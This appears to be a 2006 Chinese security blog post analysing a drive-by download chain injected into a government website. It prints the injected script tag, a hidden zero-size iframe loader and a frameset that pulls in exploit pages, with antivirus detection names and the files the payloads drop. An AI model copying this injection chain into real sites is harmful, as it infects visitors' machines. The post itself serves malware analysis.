endurer 原创
2006.01.23 第1版
今天浏览前几天说的那个被加入恶意代码的政府网站(详见: 某政府网站被加入的自动下载病毒文件的代码变了花样(第1版) ),又发现了新花样。
政府网站首页加入的代码为:
<script language="JavaScript" src="hxxp://www.***snqc.cn/images/mail.js"></script>
mail.js的内容为:
document.write("<iframe src=hxxp://www.***snqc.cn/images/error.htm width=0 height=0></iframe>");
error.htm的内容为:
<frameset rows="444,0" cols="*">
<frame src="hxxp://help.3721.com/error.html" framborder="no" scrolling="auto" noresize marginwidth="0" margingheight="0">
<frame src="top.htm" frameborder="no" scrolling="no" noresize marginwidth="0" margingheight="0">
<frame src="gif.htm" frameborder="no" scrolling="no" noresize marginwidth="0" margingheight="0">
<frame src="hxxp://help.3721.com/error.html" frameborder="no" scrolling="no" noresize marginwidth="0" margingheight="0">
</frameset>
top.htm 瑞星报为:Exploit.VBS.Phel.z,江民KV报为:Exploit.VBS.Phel.ab,Kaspersky报为:Exploit.VBS.Phel.be。
gif.htm 瑞星报为:Exploit.HTML.Mht,江民KV不报,Kaspersky报为:Exploit.HTML.Mht。
top.htm的内容是用escape()加密的脚本。此脚本会尝试生成文件c:/WINDOWS/Help/apps.chm,自动下载:hxxp://www.***snqc.cn/images/tzd.js。
tzd.js的内容也是用escape()加密的脚本,其中部分代码使用escape()加密了两次。此脚本会尝试生成文件C:/AUTOEXEC.COM,c:/NTDETECT.hta。
tzd.js:瑞星和江民KV报为Exploit.VBS.Phel,Kaspersky报为:Exploit.VBS.Phel.bq。